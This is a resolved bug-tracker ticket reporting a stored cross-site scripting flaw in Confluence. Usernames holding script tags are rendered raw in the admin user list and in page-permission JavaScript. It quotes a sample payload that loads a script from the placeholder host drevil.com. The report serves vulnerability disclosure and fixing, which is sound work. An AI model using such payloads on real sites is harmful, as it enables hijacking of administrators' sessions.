-
Bug
-
Resolution: Fixed
-
High
-
2.2.9, 2.3
-
None
When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.
Two places I've spotted the raw HTML so far:
- Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
- When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:
if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";
- causes
-
CONFSERVER-13890 Tooltip showing number of attachments is showing for all items in the Browse menu
- Closed
- is blocked by
-
CONFSERVER-9627 Velocity does not automatically escape HTML entities when substituting variables
- Closed
- is related to
-
CONFSERVER-11002 viewuser.action has an XSS problem around username
- Closed